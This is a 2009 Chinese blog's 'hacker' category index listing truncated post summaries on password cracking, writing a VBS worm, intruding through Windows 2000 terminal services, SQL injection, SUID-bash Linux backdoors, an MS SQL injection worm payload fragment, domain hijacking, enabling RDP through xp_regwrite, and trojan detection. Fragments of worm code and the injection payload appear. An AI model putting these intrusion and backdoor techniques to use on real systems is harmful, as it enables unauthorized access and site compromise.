随笔分类 -  黑客

计算机十二种常用密码破解法
摘要:在日常操作中,我们经常要输入各种各样的密码,例 如开机时要输入密码,QQ时也要先输入密码,假如你忘记了这 些密码,就有可能用不了机器、打不开文件、不能聊天...。 也许还会造成很大的损失!下面我们就介绍电脑操作中常用密码 的破解方法,希望能解你燃眉之急! 一、遗忘了SYSTEM密码 如果你遗忘了CMOS设置中的SYSTEM密码,就无法启动机器了, 解决的办法只能是:打开机箱,把电池取下、正负极短接... 阅读全文

posted @ 2009-11-17 17:01 与时俱进 阅读(1243) 评论(0) 推荐(0) 编辑

vbs之类蠕虫病毒的编写
摘要:文章标题之所以称为类蠕虫,是因为攻击代码 即主题代码还没实现 sub yitiaolong() '定义一条龙过程 on error resume next '这里是防止没有发现匹配设备时而报错 dim drivearray '初始化数组变量 dim drive '驱动器句柄变量 dim strarray '初始化字符串数组变量 dim vbcode '用于接收变异的自身代码 dim file di... 阅读全文

posted @ 2009-11-17 16:33 与时俱进 阅读(3041) 评论(0) 推荐(0) 编辑

如何利用终端服务入侵远程计算机
摘要:用过windows 2000终端服务的人一定可以体会到终端服务的方便。但是这也给我们造成了安全风险。恶意用户可以通过猜密码进入系统,更危险的是,如果这台机器存在输入法漏洞的话,那么入侵者可以完全控制这台机器。下面我来讲讲如何利用输入法漏洞远程入侵开了终端服务的windows 2000的机器:首先我们确定某台机器的3389端口是开放的:D:\\Nmapnt>nmapNT.exe -sS -p ... 阅读全文

posted @ 2009-10-28 10:51 与时俱进 阅读(412) 评论(0) 推荐(0) 编辑

初级黑客安全技术命令详解
摘要:要想做一名真正的黑客,仅仅依靠网络流传的黑软进行扫描或者攻击是没有用的,这样永远不可能成长为一名真正的黑客,大家需要注意的是,平时还得注意积累,这次笔者就简单的 为大家介绍一些系统命令,对于初学的菜鸟绝对是必修课之一。   对了,再说两句废话吧,“工欲善其事,必先利其 器”——当然不是让你再满世界去找新的黑客软件啦(其实我不反对使用这些软件,相反我... 阅读全文

posted @ 2009-10-28 10:48 与时俱进 阅读(501) 评论(0) 推荐(0) 编辑

SQL注入专题--整理帖
摘要:SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一 部分程序员在编写代码的时候,没有对用户输入数据的合法性... 阅读全文

posted @ 2009-10-15 14:26 与时俱进 阅读(447) 评论(0) 推荐(1) 编辑

对linux下perl backdoor的一段分析
摘要:背景一个朋友的服务器出现了一个莫名其妙的inetd 进程,开了 21000 端口,怀疑被入侵。登陆上去简单检查了一下,发现骇客不留神把后门的一个副本,遗留在临时目录下。经过检查是个用 perl 脚本写的后门。叫 Telnet-like Standard Daemon。后门找到了,入侵事件也基本被定性。1. 目前主机上还运行着该后门,很有可能黑客已经通过编写启动脚本,将后门加入了随机启动。2. 该主... 阅读全文

posted @ 2009-10-14 09:02 与时俱进 阅读(1003) 评论(0) 推荐(0) 编辑

介绍一个超初级的linux后门制作方法
摘要:众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方, 然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了。   下面来介绍一下文件权限的具体意义   一个文件都有一个所有者, 表示该文件是谁创建的. 同时, 该文件还有一个组编号... 阅读全文

posted @ 2009-09-18 12:55 与时俱进 阅读(681) 评论(1) 推荐(0) 编辑

一个MS SQL蠕虫代码
摘要:以下是十六进制转换后的,解码后的文件在下部,这个语句会在网站各个文件末尾插入一句JS 代码。---------------------------------------------------------------------------------';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004... 阅读全文

posted @ 2009-09-14 09:04 与时俱进 阅读(472) 评论(0) 推荐(0) 编辑

黑客域名劫持攻击详细步骤
摘要:近期发现adobe.com,internet.com,nike.com,等等著名站点都分分遭受到攻击,但攻击者所使用的技术并不是以往所使用的入侵WEB服务器,更改主页的惯用手法,攻击者使用的是一种域名劫持攻 击?攻击者通过冒充原域名拥有者以E-MAIL方式修改网络解决方案公司的注册域名记录,将域名转让到另一团体,通过在修改后注册信息所指定的DNS服务 器加进该域名记录,让原域名指向另一IP的服务器... 阅读全文

posted @ 2009-09-14 08:48 与时俱进 阅读(834) 评论(0) 推荐(0) 编辑

吃透木马原理,把它扼杀在摇篮里
摘要:不知道自己的计算机中了“木马”该怎么样清除。因此最关键的还是要知道“木马”的工作原理,这样就会很容易发现“木马”。 “木马”程序会想尽一 切办法隐藏自己,主要途径有:在任务栏中隐藏自己,这是最基本的只要把Form的Visible属性设为False、ShowInTaskBar设为 False,程序运行时就... 阅读全文

posted @ 2009-09-14 08:41 与时俱进 阅读(502) 评论(0) 推荐(0) 编辑

拦门四斧 砍清操作系统中各类型木马后门
摘要:黑客入侵后要做的事就是上传木马后门,为了能够让上传的木马不被发现,他们会想尽种种方法对其进行伪装。而作为被害者,我们又该如何识破伪装,将系统中的木马统统清除掉呢! 一、文件捆绑检测 将木马捆绑在正常程序中,一直是木马伪装攻击的一种常用手段。下面我们就看看如何才能检测出文件中捆绑的木马。 1.MT捆绑克星 文件中只要捆绑了木马,那么其文件头特征码一定会表现出一定的规律,而MT捆绑克星正是通过分析程序... 阅读全文

posted @ 2009-09-14 08:40 与时俱进 阅读(334) 评论(0) 推荐(0) 编辑

SQL语句直接开启3389
摘要:其实就是利用MSSQL的存储过程xp_regwrite 。大家在渗透MSSQL服务器的时候,苦于无法上传开3389工具和3389工具不免杀时,可以使用此招轻松开启3389。 3389登陆关键注册表位置:HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\DenyTSConnections 其 中键值DenyTSCo... 阅读全文

posted @ 2009-08-14 10:32 与时俱进 阅读(2091) 评论(0) 推荐(0) 编辑

友情链接:同里老宅院民居客栈